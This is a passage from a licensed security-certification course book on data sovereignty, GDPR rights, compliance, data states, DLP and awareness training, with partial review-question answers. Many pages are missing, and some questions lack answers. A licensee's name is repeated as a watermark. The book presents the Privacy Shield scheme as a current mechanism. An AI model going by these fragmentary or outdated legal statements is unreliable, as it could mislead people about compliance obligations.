storage from taking place on systems that do not physically reside within that
jurisdiction. Data sovereignty may demand certain concessions on your part, such
as using location-specific storage facilities in a cloud service.
For example, GDPR protections are extended to any EU citizen while they are within
EU or EEA (European Economic Area) borders. Data subjects can consent to allow a
transfer but there must be a meaningful option for them to refuse consent. If the
transfer destination jurisdiction does not provide adequate privacy regulations (to
a level comparable to GDPR), then contractual safeguards must be given to extend
GDPR rights to the data subject. In the United States, companies can self-certify
that the protections they offer are adequate under the Privacy Shield scheme
(privacyshield.gov/US-Businesses).
Geographical Considerations
Geographic access requirements fall into two different scenarios:
• Storage locations might have to be carefully selected to mitigate data sovereignty
issues. Most cloud providers allow a choice of datacenters for processing and
storage, ensuring that information is not illegally transferred from a particular
privacy jurisdiction without consent.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Privacy Data
Privacy data refers to personally identifiable or sensitive information associated
with an individual’s personal, financial, or social identity, including data that, if
exposed or mishandled, could infringe upon an individual’s privacy rights. Examples
of privacy data include names, addresses, contact information, social security
numbers, medical records, financial transactions, and, generally, any other data
that can be used to identify a specific person. Privacy data and confidential data
have certain similarities. Both types of data require protection due to their sensitive
nature. Unauthorized access, disclosure, or misuse of privacy or confidential data
can negatively affect individuals or organizations.
Additionally, both privacy data and confidential data are subject to legal and ethical
considerations. Organizations must comply with relevant laws and regulations, such
as data protection and privacy laws, to safeguard both data types. However, there
are also notable differences between privacy data and confidential data.
Confidential data encompasses any information that requires protection due to
its confidential nature, regardless of whether it pertains to an individual. Examples
include trade secrets, intellectual property, financial statements, proprietary
algorithms, source code, and other nonpublic information. Privacy data, on
the other hand, specifically refers to information that can identify or impact an
individual’s privacy. Confidential data is primarily concerned with safeguarding
information from unauthorized access, use, or disclosure to maintain business
competitiveness, protect intellectual property, or preserve the integrity of sensitive
company data.
Privacy data focuses on protecting personal information to preserve an individual’s
privacy rights, prevent identity theft, and maintain the confidentiality of personal
details. Privacy data is closely associated with the rights of individuals to control
the use and disclosure of their personal information. Individuals have the right
to access, correct, and request the deletion of their privacy data. In contrast,
confidential data typically does not grant specific rights to the data subjects, as
it relates more to organizations’ proprietary information. The handling of privacy
data often requires explicit consent from the data subject for its collection, use,
and disclosure, particularly in compliance with privacy laws and regulations. On
the other hand, confidential data, while protected, may not necessarily require
individual consent for its handling, as it is associated with internal or business-
related information.
Privacy and confidential data share similarities in sensitivity and legal
considerations. However, scope, focus, data subject rights, and consent
requirements differ. While both types of data require careful handling and
protection, privacy data pertains explicitly to personal information and individual
privacy rights.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Legal Implications
Protecting privacy data carries significant local, national, and global legal
implications. Many countries have specific privacy laws and regulations that dictate
how personal data should be handled within their jurisdiction. These laws define
the rights of individuals, the responsibilities of organizations, and the procedures
for data protection and privacy enforcement. At the national level, data protection
authorities or supervisory bodies enforce privacy laws and oversee compliance.
They have the authority to investigate data breaches, issue fines, and take legal
action against organizations that fail to protect privacy data or violate individuals’
privacy rights. The General Data Protection Regulation (GDPR) in the European
Union has had a substantial impact globally by setting high privacy and data
protection standards. GDPR applies to organizations that process the personal
data of EU residents, regardless of their physical location. This extraterritorial
effect ensures that organizations worldwide adhere to GDPR principles when
handling EU citizens’ personal data. Cross-border data transfers are also subject
to specific requirements and restrictions. For example, the GDPR restricts
transferring personal data outside the European Economic Area unless adequate
safeguards exist to protect privacy data. Understanding and adhering to these
legal requirements are essential to avoid legal consequences, maintain trust with
individuals, and foster a global culture of privacy and data protection.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Privacy Act (CCPA). One of the rights afforded to data subjects is the right of access,
meaning that data subjects have the right to request access to their personal data
and obtain information about how it is being processed. Subjects can inquire about
the purposes of processing, the categories of data being processed, recipients
of the data, and the duration of data retention. Data subjects have the right to
rectification, which means that if data subjects discover that the personal data
held by an organization is inaccurate or incomplete, they have the right to request
its correction to ensure that their personal data is up to date and accurate. Data
subjects also have the right to request the erasure or removal of their personal data
under certain circumstances.
For example, if the data is no longer necessary for the purposes it was collected,
or if the data subject withdraws their consent for its processing, they can request
its deletion. Data subjects can request the restriction of processing their personal
data. The implications are that while privacy data can still be stored, it cannot be
processed further except under specific conditions. This right gives data subjects
control over their personal data’s ongoing use. Data portability is another right
granted to data subjects. Subjects have the right to receive their personal data in
a commonly used and machine-readable format, ensuring their ability to move
and transfer their personal information as desired. Data subjects have the right
to object to processing their personal data based on specific grounds. Examples
include if a subject believes their data is being processed for purposes that are not
legitimate or if they wish to object to direct marketing activities. Lastly, data subjects
have the right to withdraw their consent for the processing of their personal data.
If the processing is based on their consent, they can revoke it at any time, and the
organization must cease processing the data accordingly.
Data subjects exercise these rights by contacting the Data Controller, who ensures
that data subject rights are respected, facilitating the exercise of these rights, and
addressing any concerns or requests from data subjects.
Right to Be Forgotten
The “right to be forgotten” is a fundamental principle outlined in the General Data
Protection Regulation (GDPR) that grants data subjects the right to request the
erasure or deletion of their personal data under certain circumstances. It empowers
individuals to have their personal information removed from online platforms,
databases, or any other sources where their data is being processed and made
publicly available.
The right to be forgotten recognizes the importance of individual privacy and
control over personal data. Upon receiving a valid erasure request, the Data
Controller must erase the personal data promptly unless there are legitimate
grounds for refusing the request. This right extends to the removal of data from
the organization’s systems and to any third parties with whom the data has been
shared or made publicly available. This right may be limited if the processing of
personal data is necessary for exercising the right of freedom of expression and
information, compliance with a legal obligation, or the establishment, exercise,
or defense of legal claims. The right to be forgotten serves as a mechanism for
individuals to regain control over their personal information. It promotes privacy
and data protection by enabling subjects to remove personal data when it is no
longer necessary or lawful to retain it.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
placed on the rights and protections of the data subject rather than determining
ownership. The data subject has control over their personal data and can exercise
certain rights, such as the right to access, rectify, and delete their data.
However, organizations that collect and process personal data are considered
custodians or stewards of the data rather than owners. They have legal and
ethical responsibilities to handle personal data securely and lawfully and to
respect the rights of the data subjects. It is important to note that privacy data
often consists of information about individuals, and those individuals have a
strong interest in protecting their personal information. Data protection laws
aim to provide individuals with control and protection over their personal data,
ensuring transparency, consent, and fair processing practices. While the concept
of ownership might not directly apply to privacy data, individuals have rights and
control over their personal information, and organizations are legally accountable
for handling the data responsibly. The focus is on safeguarding privacy rights and
ensuring data protection rather than assigning ownership in the traditional sense.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Organizational Consequences
A data or privacy breach can have severe organizational consequences:
• Reputation damage—data breaches cause widespread negative publicity, and
customers are less likely to trust a company that cannot secure its information
assets.
• Identity theft—if the breached data is exploited to perform identity theft, the
data subject may be able to sue for damages.
• IP theft—loss of company data can lead to loss of revenue. This typically occurs
when copyright material—unreleased movies and music tracks—is breached.
The loss of patents, designs, trade secrets, and so on to competitors or state
actors can also cause commercial losses, especially in overseas markets where IP
theft may be difficult to remedy through legal action.
Notifications of Breaches
The requirements for different types of breach are set out in law and/or in
regulations. The requirements indicate who must be notified. A data breach can
mean the loss or theft of information, the accidental disclosure of information,
or the loss or damage of information. Note that there are substantial risks
from accidental breaches if effective procedures are not in place. If a database
administrator can run a query that shows unredacted credit card numbers, that is a
data breach, regardless of whether the query ever leaves the database server.
Escalation
A breach may be detected by technical staff and if the event is considered minor,
there may be a temptation to remediate the system and take no further notification
action. This could place the company in legal jeopardy. Any breach of personal data
and most breaches of IP should be escalated to senior decision-makers and any
impacts from legislation and regulation properly considered.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Compliance
Security compliance refers to organizations’ adherence to applicable security
standards, regulations, and best practices to protect sensitive information, mitigate
risks, and ensure data confidentiality, integrity, and availability. Effective compliance
necessitates establishing and implementing policies, procedures, controls, and
technical measures to meet the requirements set forth by regulatory bodies,
industry standards, and legal obligations.
Impacts of Noncompliance
Noncompliance with data protection laws and regulations can have severe
consequences for organizations. The consequences vary depending on jurisdiction
and the specific regulations violated. Common ramifications for noncompliance
include legal sanctions such as financial penalties, legal liabilities, reputational
damage, and loss of customer trust. Sanctions refer to penalties, disciplinary
actions, or measures imposed due to noncompliance with laws, regulations, or
rules. Sanctions are enforced by governing bodies, regulatory authorities, or
organizations overseeing the specific domain in which the noncompliance occurred.
Regulatory agencies may impose substantial fines, which can amount to millions or
even billions of dollars, depending on the severity of the violation. Legal action from
affected individuals or data subjects may lead to costly lawsuits and settlements.
Noncompliance can harm an organization’s reputation, eroding customer trust,
decreasing business opportunities, and potentially losing contracts or partnerships.
Organizations may also face additional regulatory scrutiny, including increased
audits, investigations, or mandated remediation measures. Organizations must
prioritize data protection compliance, implement appropriate security measures,
conduct regular risk assessments, and stay informed about evolving data protection
laws and regulations to avoid these consequences.
Due diligence in the context of data protection describes the comprehensive assessment
and evaluation of an organization's data protection practices and measures. It involves
examining and verifying the adequacy of data security controls, privacy policies, data
handling procedures, and compliance with applicable laws and regulations.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Software Licensing
Noncompliance with software licensing requirements can result in the revocation
of usage rights and other consequences such as fines. Violations of license
agreements, such as exceeding permitted installations, unauthorized sharing, or
other unauthorized usage, constitute contractual noncompliance. Other forms
of noncompliance include breaching license terms, such as modifying code or
distributing software without authorization. In response, software vendors or
licensing authorities may revoke or suspend licenses and take other legal actions.
The loss of software licenses can disrupt business operations, causing inefficiencies
and workflow interruptions as well as cause significant reputational damage.
To ensure compliance, organizations can rectify noncompliance through license
remediation, proper license management, and audits.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Compliance Monitoring
Compliance with legal and regulatory requirements, industry standards, and
internal policies can be ensured through diligent monitoring of an organization’s
actions. This involves conducting thorough investigations and assessments of third
parties, such as vendors or business partners, to ensure they comply with relevant
regulations.
Moreover, taking reasonable precautions and implementing necessary controls to
protect sensitive information and prevent noncompliance is essential. Attestation
and acknowledgment are also integral to compliance monitoring, requiring
individuals or entities to formally acknowledge their understanding of compliance
obligations and commitment to adhere to them through signed agreements, policy
acknowledgments, and training activities. This provides evidence of an individual
or organization’s commitment to compliance and serves as the foundation for
monitoring and enforcement. Compliance monitoring can be conducted internally
or externally, with self-assessments, internal audits, and reviews conducted
internally and independent audits, assessments, or regulatory inspections
conducted externally. Automation is vital in compliance monitoring, with
compliance management software being a critical tool in data collection, analysis,
and reporting. Automation streamlines monitoring activities, improves accuracy,
and enhances the ability to detect noncompliance or anomalies promptly.
Data Protection
Classifying data as “at rest,” “in motion,” and “in use” is crucial for effective data
protection and security measures. By analyzing data based on its state (at rest,
in motion, in use), organizations can tailor security measures and controls
to address the specific risks and requirements associated with each data
state. This classification helps organizations identify vulnerabilities, prioritize
security investments, and ensure appropriate safeguards to protect sensitive
data throughout its lifecycle. It also facilitates compliance with data protection
regulations and industry best practices.
• Data at rest—this state means that the data is in some sort of persistent
storage media. Examples of types of data that may be at rest include financial
information stored in databases, archived audiovisual media, operational
policies and other management documents, system configuration data, and
more. In this state, it is usually possible to encrypt the data, using techniques
such as whole disk encryption, database encryption, and file- or folder-level
encryption. It is also possible to apply permissions—access control lists (ACLs)—
to ensure only authorized users can read or modify the data. ACLs can be
applied only if access to the data is fully mediated through a trusted OS.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Data in transit (or data in motion)—this is the state when data is transmitted
over a network. Examples of types of data that may be in transit include
website traffic, remote access traffic, data being synchronized between cloud
repositories, and more. In this state, data can be protected by a transport
encryption protocol, such as TLS or IPSec.
With data at rest, there is a greater encryption challenge than with data in transit as the
encryption keys must be kept secure for longer. Transport encryption can use ephemeral
(session) keys.
• Data in use (or data in processing)—this is the state when data is present in
volatile memory, such as system RAM or CPU registers and cache. Examples of
types of data that may be in use include documents open in a word processing
application, database data that is currently being modified, event logs being
generated while an operating system is running, and more. When a user works
with data, that data usually needs to be decrypted as it goes from in rest to in
use. The data may stay decrypted for an entire work session, which puts it at
risk. However, trusted execution environment (TEE) mechanisms, such as Intel
Software Guard Extensions (software.intel.com/content/www/us/en/develop/
topics/software-guard-extensions/details.html), are able to encrypt data as it
exists in memory, so that an untrusted process cannot decode the information.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Method Description
Tokenization Tokenization replaces sensitive data with a randomly
generated token while securely storing the original
data in a separate location. Tokens have no
meaningful value, reducing the risk of unauthorized
access or exposure of sensitive information.
A common use case for data tokenization is in
payment processing systems. When customers
make a payment, their sensitive payment card
information, such as credit card numbers, is replaced
with a randomly generated token. This token is then
used to represent the payment card data during
transactions and is stored in the system’s database.
Obfuscation Obfuscation involves modifying data to make it
difficult to understand or reverse engineer without
altering functionality. Software development
commonly uses obfuscation techniques to protect
source code intellectual property and prevent
unauthorized access to critical details. Examples
of obfuscation include data masking, data type
conversion, and hashing.
Segmentation Segmentation is a method of securing data by
dividing networks, data, and applications into
isolated components to improve sensitive data
protection, limit the impact of a breach, and improve
network security. Segmentation helps restrict
access based on user roles, privileges, location, or
other criteria. It helps limit exposure by granting
access only to the specific data segments required
for authorized users or processes. A common use
case for data segmentation is in healthcare systems
or electronic health records (EHRs). Patient data is
often categorized and segmented in these systems
based on various factors, such as medical conditions,
departments, or access levels. Data segmentation
allows healthcare professionals to control and limit
access to sensitive patient information based on
the principle of least privilege. Different healthcare
providers, specialists, or departments may have
access only to the specific patient data relevant to
their roles or treatment responsibilities.
Permission Restrictions Permission restrictions involve controlling access to
data based on user permissions. It ensures that only
authorized individuals or roles can view, modify, or
interact with specific data elements, reducing the risk
of unauthorized access, data breaches, or accidental
misuse. Access Control Lists, Role-Based Access
Control, Rule-based Access Control, Mandatory
Access Control, Attribute-Based Access Control,
and other methods enforce the principle of least
privilege.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Endpoint agents—to enforce policy on client computers, even when they are
not connected to the network.
DLP agents scan content in structured formats, such as a database with a formal
access control model, or unstructured formats, such as email or word processing
documents. A file cracking process is applied to unstructured data to render it in
a consistent scannable format. The transfer of content to removable media, such
as USB devices, or by email, instant messaging, or even social media, can then
be blocked if it does not conform to a predefined policy. Most DLP solutions can
extend the protection mechanisms to cloud storage services, using either a proxy to
mediate access or the cloud service provider’s API to perform scanning and policy
enforcement.
Creating a DLP policy in Office 365. (Screenshot used with permission from Microsoft.)
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Remediation is the action the DLP software takes when it detects a policy violation.
The following remediation mechanisms are typical:
• Alert only—the copying is allowed, but the management system records an
incident and may alert an administrator.
• Block—the user is prevented from copying the original file but retains access to
it. The user may or may not be alerted to the policy violation, but it will be logged
as an incident by the management engine.
• Quarantine—access to the original file is denied to the user (or possibly any
user). This might be accomplished by encrypting the file in place or by moving it
to a quarantine area in the file system.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Data Classification and Compliance
3
labeling project?
database for a hobbyist site with a global audience. The site currently
collects account details with no further information. What should be
added to be in compliance with data protection regulations?
5. This state means that the data is in some sort of persistent storage
5.
media.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
processing systems.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 16B
Personnel Policies
8
Conduct Policies
Operational policies include privilege/credential management, data handling,
and incident response. Other important security policies include those governing
employee conduct and respect for privacy.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Site security procedures, restrictions, and advice, including safety drills, escorting
guests, use of secure areas, and use of personal devices.
• Password and account management plus security features of PCs and mobile
devices.
• Secure use of software such as browsers and email clients plus appropriate use
of Internet access, including social networking sites.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
CBT might use video game elements to improve engagement. For example,
students might win badges and level-up bonuses such as skills or digitized loot to
improve their in-game avatar. Simulations might be presented so that the student
chooses encounters from a map and engages with a simulation environment in a
first person shooter type of 3D world.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic Description
Social Engineering Social engineering training raises awareness
about common social engineering tactics
employed by attackers, such as phishing,
pretexting, or baiting. It helps individuals
recognize and avoid falling victim to these
manipulative techniques, encouraging
skepticism and critical thinking when interacting
with unknown or suspicious requests.
Operational Security Operational security training focuses on
promoting good security practices in day-to-
day operations. It covers physical security,
workstation security, data classification, secure
communications, and incident reporting to
help users understand their role in preventing
security incidents.
Hybrid/Remote Work Hybrid/remote work training addresses
Environments the unique security challenges associated
with working from home or outside the
traditional office environment. It covers
topics such as secure remote access, secure
Wi-Fi usage, protecting physical workspaces,
and maintaining data security while working
remotely.
Training employees about safe computer use is critical to protecting data and mitigating
the risks associated with cyberattacks. (Image by rawpixel © 123RF.com.)
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Phishing Campaigns
Phishing campaigns used as employee training mechanisms involve simulated
attacks to raise awareness and educate employees about the risks and
consequences of falling victim to such attacks. By conducting mock phishing
exercises, organizations aim to enhance threat awareness, protect sensitive
information, mitigate social engineering risks, promote incident response, and
strengthen security practices. Phishing attacks are prevalent and pose significant
risks to many industries, making it essential for employees to know how to defend
against them. Phishing is an effective attack vector due to its exploitation of
human vulnerabilities, deceptive impersonation of trusted entities, psychological
manipulation, broad reach, ease of use, dynamic capabilities, adaptability, and
the potential for significant financial gain. These factors make phishing attacks
difficult to detect, mitigate and underscore the importance of practicing vigilance
and regularly training employees to recognize and respond effectively to phishing
attempts.
Through training, employees become more aware of common phishing techniques
and deceptive tactics used by cybercriminals. This knowledge helps them to
identify and report suspicious emails or messages, reducing the likelihood of data
breaches and unauthorized access to sensitive information. By training employees
to recognize phishing attempts, organizations mitigate social engineering risks.
Employees learn to identify messages that use common tactics such as urgent
requests, spoofed identities, and enticing offers to manipulate individuals. This
knowledge helps protect employees and their organization from disclosing
credentials or confidential data, or installing malware. Effective training enables
employees to respond appropriately to phishing attempts, such as reporting
incidents to specific IT or security teams, refraining from clicking suspicious links
or opening attachments, and verifying requests sent via email using alternative
channels. Training employees to recognize and respond to phishing attempts
strengthens an organization’s cybersecurity defenses. It cultivates a culture of
security awareness, empowers employees to protect sensitive information actively,
and enhances the organization’s resilience against evolving threats. Complemented
by simulated phishing campaigns, regular training programs help build a
knowledgeable and security-conscious workforce.
Anomalous Behavior
Anomalous behavior recognition refers to actions or patterns that deviate
significantly from expectations. Examples include unusual network traffic, user
account activity anomalies, insider threat actions, abnormal system events, and
fraudulent transactions. Techniques such as network intrusion detection, user
behavior analytics, system log analysis, and fraud detection are utilized to identify
anomalous behavior. These techniques require monitoring and analyzing different
data sources, comparing observed behavior against established baselines, and
utilizing machine learning algorithms to detect deviations.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The first phase is assessing the organization’s security needs and risks. Planning
and designing awareness training activities follow, where a comprehensive plan
is developed, including objectives, topics, and delivery methods. Once a plan is
created, the development stage focuses on creating engaging and informative
training materials. Training is then delivered through previously identified delivery
methods, such as in-person or computer-based sessions. Evaluation and feedback
activities assess the training’s effectiveness and gather participant insights.
Security awareness is reinforced via reoccurring training activities to ensure it
remains a priority and often includes refresher training, reminders, newsletters,
and awareness campaigns. Monitoring and adaptation allow organizations to
continually evaluate the program’s impact and make necessary adjustments
based on emerging risks and changing requirements. Organizations can establish
a continuous and effective security awareness training program by following this
lifecycle. It helps enhance employee knowledge, steer behaviors, and cultivate
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Importance of Personnel Policies
9
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16B
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 16
Summary
4
You should be able to explain the importance of data governance policies and tools
to mitigate the risk of data breaches and privacy breaches and implement security
solutions for data protection.
• Assign roles to ensure the proper management of data within its lifecycle.
• Use policies and procedures that hinder social engineers from eliciting
information or obtaining unauthorized access.
• Use training and education programs to help employees mainintain the safety
and security of the organization’s data assets.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. What term is used to describe the property of a secure network where a sender cannot deny
2.
Non-repudiation
Gap analysis
4. What process within an access control framework logs actions performed by subjects?
Accounting
Authorization means granting the account that has been configured for the user on the computer system
the right to make use of a resource. Authorization manages the privileges granted on the resource.
Authentication protects the validity of the user account by testing that the person accessing that account is
who they say they are.
A user’s actions are logged on the system. Each user is associated with a unique computer account. As
long as the user’s authentication is secure and the logging system is tamperproof, they cannot deny having
performed the action.
1. You have implemented a secure web gateway that blocks access to a social networking site.
How would you categorize this type of security control?
2. A company has installed motion-activated floodlighting on the grounds around its premises.
2.
It would be classed as a physical control, and its function is both detecting and deterring.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
3. A firewall appliance intercepts a packet that violates policy. It automatically updates its access
3.
control list to block all further packets from the source IP. What TWO functions did the security
control perform?
4. If a security control is described as operational and compensating, what can you determine
4.
The control is enforced by a person rather than a technical system, and the control has been developed to
replicate the functionality of a primary control, as required by a security standard.
5. A multinational company manages a large amount of valuable intellectual property (IP) data,
5.
plus personal data for its customers and account holders. What type of business unit can be
used to manage such important and complex security requirements?
6. A business is expanding rapidly, and the owner is worried about tensions between its
6.
established IT and programming divisions. What type of security business unit or function could
help to resolve these issues?
Development and operations (DevOps) is a cultural shift within an organization to encourage more
collaboration between developers and systems administrators. DevSecOps embeds the security function
within these teams as well.
4
Review Activity: Threat Actors
1. Which of the following would be assessed by likelihood and impact: vulnerability, threat, or risk?
Risk. To assess likelihood and impact, you must identify both the vulnerability and the threat posed by a
potential exploit.
False. Nation-state actors have targeted commercial interests for theft, espionage, and extortion.
3. You receive an email with a screenshot showing a command prompt at one of your application
servers. The email suggests you engage the hacker for a day’s consultancy to patch the
vulnerability. How should you categorize this threat?
If the consultancy is refused and the hacker takes no further action, it can be classed as for financial gain
only. If the offer is declined and the hacker then threatens to sell the exploit or to publicize the vulnerability,
then the motivation is criminal.
4. Which type of threat actor is primarily motivated by the desire for political change?
Hacktivist
5. Which three types of threat actor are most likely to have high levels of funding?
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
6
Review Activity: Attack Surfaces
1. A company uses stock photos from a site distributing copyright-free media to illustrate its
websites and internal presentations. Subsequently, one of the company’s computers is found
infected with malware that was downloaded by code embedded in the headers of a photo file
obtained from the site. What threat vector(s) does this attack use?
The transmission vector is image based, and the use of a site known to be used by the organization makes
this a supply chain vulnerability (even though the images are not paid for). It’s not stated explicitly, but the
attack is also likely to depend on a vulnerability in the software used to download and/or view or edit the
photo.
This is a supply chain vulnerability, specifically arising from the company’s managed service provider (MSP).
3. A company uses cell phones to provide IT support to its remote employees, but it does not
maintain an authoritative directory of contact numbers for support staff. Risks from which
specific threat vector are substantially increased by this oversight?
Voice calls: the risk that threat actors could impersonate IT support personnel to trick employees into
revealing confidential information or installing malware.
8
Review Activity: Social Engineering
1. The help desk takes a call, and the caller states that she cannot connect to the e-commerce
website to check her order status. She would also like a username and password. The user
gives a valid customer company name but is not listed as a contact in the customer database.
The user does not know the correct company code or customer ID. Is this likely to be a social
engineering attempt, or is it a false alarm?
This is likely to be a social engineering attempt. The help desk should not give out any information or add an
account without confirming the caller’s identity.
2. A purchasing manager is browsing a list of products on a vendor’s website when a window opens
2.
claiming that antimalware software has detected several thousand files on their computer that
are infected with viruses. Instructions in the official-looking window indicate the user should
click a link to install software that will remove these infections. What type of social engineering
attempt is this, or is it a false alarm?
This is a social engineering attempt utilizing a watering hole attack and brand impersonation.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
3. Your CEO calls to request market research data immediately be forwarded to their personal
3.
email address. You recognize their voice, but a proper request form has not been filled out and
use of third-party email is prohibited. They state that normally they would fill out the form and
should not be an exception, but they urgently need the data to prepare for a roundtable at a
conference they are attending. What type of social engineering techniques could this use, or is it
a false alarm?
If social engineering, this is a CEO fraud phishing attack over a voice channel (vishing). It is possible that it
uses deep fake technology for voice mimicry. The use of a sophisticated attack for a relatively low-value data
asset seems unlikely, however. A fairly safe approach would be to contact the CEO back on a known mobile
number.
4. A company policy states that any wire transfer above a certain value must be authorized by two
employees, who must separately perform due diligence to verify invoice details. What specific
type of social engineering is this policy designed to mitigate?
10
Review Activity: Cryptographic Algorithms
1. Which part of a simple cryptographic system must be kept secret—the cipher, the ciphertext, or
the key?
In cryptography, the security of the message is guaranteed by the security of the key. The system does not
depend on hiding the algorithm or the message (security by obscurity).
2. Considering that cryptographic hashing is one way and the digest cannot be reversed, what
2.
Because two parties can hash the same data and compare digests to see if they match, hashing can be used
for data verification in a variety of situations, including password authentication. Hashes of passwords,
rather than the password plaintext, can be stored securely or exchanged for authentication. A hash of a file
or a hash code in an electronic message can be verified by both parties.
Confidentiality—symmetric ciphers are generally fast and well suited to bulk encrypting large amounts of
data.
Each key can reverse the cryptographic operation performed by its pair but cannot reverse an operation
performed by itself. The private key must be kept secret by the owner, but the public key is designed to be
widely distributed. The private key cannot be determined from the public key, given a sufficient key size.
A hashing function is used to create a message digest. The digest is then signed using the sender’s private
key. The resulting signature can be verified by the recipient using the sender’s public key and cannot be
modified by any other agency. The recipient can calculate their own digest of the message and compare it to
the signed hash to validate that the message has not been altered.
Solutions
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
12
Review Activity: Public Key Infrastructure
13
In most cases, the subject generates a key pair, adds the public key along with subject information and
certificate type in a certificate signing request (CSR), and submits it to the CA. If the CA accepts the request, it
generates a certificate with the appropriate key usage and validity, signs it, and transmits it to the subject.
The subject’s public key and the algorithms used for encryption and hashing. The certificate also stores a
digital signature from the issuing CA, establishing the chain of trust.
